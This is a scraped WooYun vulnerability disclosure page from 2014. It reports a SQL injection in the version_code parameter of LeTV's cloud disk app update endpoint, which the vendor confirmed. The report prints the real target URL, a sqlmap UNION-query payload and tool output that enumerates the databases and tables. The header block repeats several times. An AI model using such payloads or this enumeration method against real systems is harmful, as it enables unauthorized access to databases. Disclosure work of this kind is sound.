乐视某APP存在一处SQL注入 | wooyun-2014-059329| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-059329

漏洞标题：乐视某APP存在一处SQL注入

漏洞作者：魇

提交时间：2014-05-03 22:36

修复时间：2014-06-17 22:37

公开时间：2014-06-17 22:37

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-05-03：细节已通知厂商并且等待厂商处理中
2014-05-03：厂商已经确认，细节仅向厂商公开
2014-05-13：细节向核心白帽子及相关领域专家公开
2014-05-23：细节向普通白帽子公开
2014-06-02：细节向实习白帽子公开
2014-06-17：细节向公众公开

简要描述：

SQL注入

详细说明：

乐视云盘APP：

http://cloud.letv.com/ledisk//appupdate/index?v ersion_code=1003&channel=wandoujia

version_code参数存在注入

Place: GET
Parameter: version_code
    Type: UNION query
    Title: MySQL UNION query (NULL) - 9 columns
    Payload: version_code=1003 UNION ALL SELECT NULL,CONCAT(0x71756b7171,0x52655
371416d78426d68,0x716c6e6971),NULL,NULL,NULL,NULL,NULL,NULL,NULL#&channel=wandou
jia
---
[22:19:38] [INFO] testing MySQL
[22:19:38] [INFO] confirming MySQL
[22:19:38] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[22:19:38] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\ou
tput\cloud.letv.com'
[*] shutting down at 22:19:38

---
[22:30:44] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5
[22:30:44] [INFO] fetching database names
[22:30:45] [INFO] the SQL query used returns 2 entries
[22:30:45] [INFO] retrieved: "information_schema"
[22:30:45] [INFO] retrieved: "ledisk"
available databases [2]:
[*] information_schema
[*] ledisk
[22:30:45] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\ou
tput\cloud.letv.com'
[*] shutting down at 22:30:45

Database: information_schema
[65 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| CLIENT_STATISTICS                     |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_TEMPORARY_TABLES               |
| GLOBAL_VARIABLES                      |
| INDEX_STATISTICS                      |
| INNODB_BUFFER_PAGE                    |
| INNODB_BUFFER_PAGE_LRU                |
| INNODB_BUFFER_POOL_PAGES              |
| INNODB_BUFFER_POOL_PAGES_BLOB         |
| INNODB_BUFFER_POOL_PAGES_INDEX        |
| INNODB_BUFFER_POOL_STATS              |
| INNODB_CHANGED_PAGES                  |
| INNODB_CMP                            |
| INNODB_CMPMEM                         |
| INNODB_CMPMEM_RESET                   |
| INNODB_CMP_RESET                      |
| INNODB_INDEX_STATS                    |
| INNODB_LOCKS                          |
| INNODB_LOCK_WAITS                     |
| INNODB_RSEG                           |
| INNODB_SYS_COLUMNS                    |
| INNODB_SYS_FIELDS                     |
| INNODB_SYS_FOREIGN                    |
| INNODB_SYS_FOREIGN_COLS               |
| INNODB_SYS_INDEXES                    |
| INNODB_SYS_STATS                      |
| INNODB_SYS_TABLES                     |
| INNODB_SYS_TABLESTATS                 |
| INNODB_TABLE_STATS                    |
| INNODB_TRX                            |
| INNODB_UNDO_LOGS                      |
| KEY_COLUMN_USAGE                      |
| PARAMETERS                            |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| QUERY_RESPONSE_TIME                   |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLESPACES                           |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TABLE_STATISTICS                      |
| TEMPORARY_TABLES                      |
| THREAD_STATISTICS                     |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| USER_STATISTICS                       |
| VIEWS                                 |
| XTRADB_ADMIN_COMMAND                  |
+---------------------------------------+

漏洞证明：

修复方案：

版权声明：转载请注明来源魇@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：18

确认时间：2014-05-03 23:15

厂商回复：

感谢挖掘，我们会马上修复

漏洞评价：

2014-05-04 09:19 | 小胖子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

感觉乐视到处都是注入啊，要不要来哥20连发什么的~
2014-05-04 09:35 | zzR ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1：5 无限量收 [平台担保])

@小胖子代表厂商欢迎
2014-05-04 09:36 | 小胖子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

@zzR 宝贝不要调皮，快到床上来
2014-05-04 09:58 | 魇 ( 普通白帽子 | Rank:1207 漏洞数:104 | 传闻中魇是一个惊世奇男子，但是除了他华...)

@小胖子上吧胖哥扑倒乐视！

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-059329

漏洞标题：乐视某APP存在一处SQL注入

相关厂商：乐视网

漏洞作者：魇

提交时间：2014-05-03 22:36

修复时间：2014-06-17 22:37

公开时间：2014-06-17 22:37

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源魇@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-059329

漏洞标题：乐视某APP存在一处SQL注入

相关厂商：乐视网

漏洞作者： 魇

提交时间：2014-05-03 22:36

修复时间：2014-06-17 22:37

公开时间：2014-06-17 22:37

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-059329"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 魇@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：魇

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源魇@乌云